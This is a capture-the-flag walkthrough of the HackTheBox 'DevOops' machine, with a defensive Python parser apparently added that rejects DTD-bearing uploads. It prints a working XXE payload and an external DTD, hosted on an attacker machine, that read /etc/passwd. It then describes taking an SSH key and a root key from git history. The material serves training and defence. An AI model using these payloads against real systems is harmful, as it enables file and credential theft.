DevOops Box Writeup & Walkthrough – [HTB] – HackTheBox

This article shows how to hack the DevOops box and obtain both user.txt and root.txt by using Kali Linux.

DevOops is a machine on HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.


First, we use Nmap to scan the server and identify open ports.

Ports Scan

We find that only two ports are open (22/TCP and 5000/TCP).

Let’s open the browser, and visit http://10.10.10.91:5000/.

DevOops Website

It appears to be a website, so let’s enumerate its directories.

After enumeration, we find a page where we can upload XML files.

The website allows users to upload XML files. Let’s try a simple XML first.

<note>
<Author>Tom</Author>
<Subject>Computer</Subject>
<Content>HowToBuyAMacComputer</Content>
</note>

After we submit the above file, the website returns a message.

Website Returns Info

Now, let’s submit our payload.

First, we create a new XML file:

<?xml version="1.0" ?>
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://10.10.14.2/1.dtd">%remote;%int;%trick;]>
<note>
<Author>&b;</Author>
<Subject>Jani</Subject>
<Content>Reminder</Content>
</note>

Then, we create a DTD file (1.dtd) on our local Kali Linux and insert the following content:

<!ENTITY b SYSTEM "file:///etc/passwd" >

We host an HTTP service on our local Kali Linux and place the above DTD file in its web folder.

We then submit the request and observe that we read the /etc/passwd file successfully.

XXE Read /etc/passwd File
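
From the defender's side, this read only works because the upload handler lets the parser process a DOCTYPE. The following Python code is an added example, not code from the box or from the original article: it refuses any upload that carries a DTD before an entity is declared or resolved. The names `parse_note` and `check_upload` are hypothetical, and the sample inputs are constructed from the XML shown above.

```python
from xml.parsers import expat

class UnsafeXML(ValueError):
    """Upload carries a DTD, which is where entities get declared."""

def parse_note(data: bytes) -> dict:
    """Parse a flat <note> upload, refusing any DOCTYPE it contains."""
    fields, stack, text = {}, [], []

    def reject(*_args):
        raise UnsafeXML("DOCTYPE/entity declarations are not accepted")

    def start(name, _attrs):
        stack.append(name)
        text.clear()

    def end(name):
        if len(stack) == 2:          # direct child of the root element
            fields[name] = "".join(text).strip()
        stack.pop()
        text.clear()

    parser = expat.ParserCreate()
    # StartDoctypeDeclHandler fires before any entity declaration is read.
    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject          # defence in depth
    parser.ExternalEntityRefHandler = reject   # defence in depth
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return fields

def check_upload(data: bytes):
    """Return (fields, None) when accepted, (None, reason) when rejected."""
    try:
        return parse_note(data), None
    except UnsafeXML as exc:
        return None, str(exc)
    except expat.ExpatError as exc:
        return None, f"malformed XML: {exc}"

# Constructed samples, taken from the XML shown in this article.
BENIGN = (b"<note><Author>Tom</Author><Subject>Computer</Subject>"
          b"<Content>HowToBuyAMacComputer</Content></note>")
XXE = (b'<?xml version="1.0" ?>\n<!DOCTYPE convert [ <!ENTITY % remote SYSTEM '
       b'"http://10.10.14.2/1.dtd">%remote;%int;%trick;]>\n'
       b"<note><Author>&b;</Author></note>")
NO_DTD = b"<note><Author>&b;</Author></note>"  # entity used, never declared
```

Logging the rejection reason together with the client address gives the blue team a signal for uploads that attempt to declare entities.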

Since the SSH service is running on the server, I am going to attempt to obtain the SSH key.

XXE Read SSH Key File

Then, we obtain user.txt.

Obtain User.txt

We identify that there is a “git” user, so we try to log in as git.

Login as Git

Then, we check the .bash_history file.

Git User Bash History

We find that the git user initialized a git repo. Let’s go to this folder and see what we can find.

After navigating to the blogfeed folder, we check the git log.

Blogfeed Git Log

We find that the user added an ssh key. We then check this commit.

Git Commit

We download the SSH key and use it to successfully log in to the target server as the root user.

Obtain Root.txt

This box is not difficult. It has 2 challenges: the first is to create the XXE payload, and the second is enumeration and identifying the git user. The box also requires some knowledge of git commands.
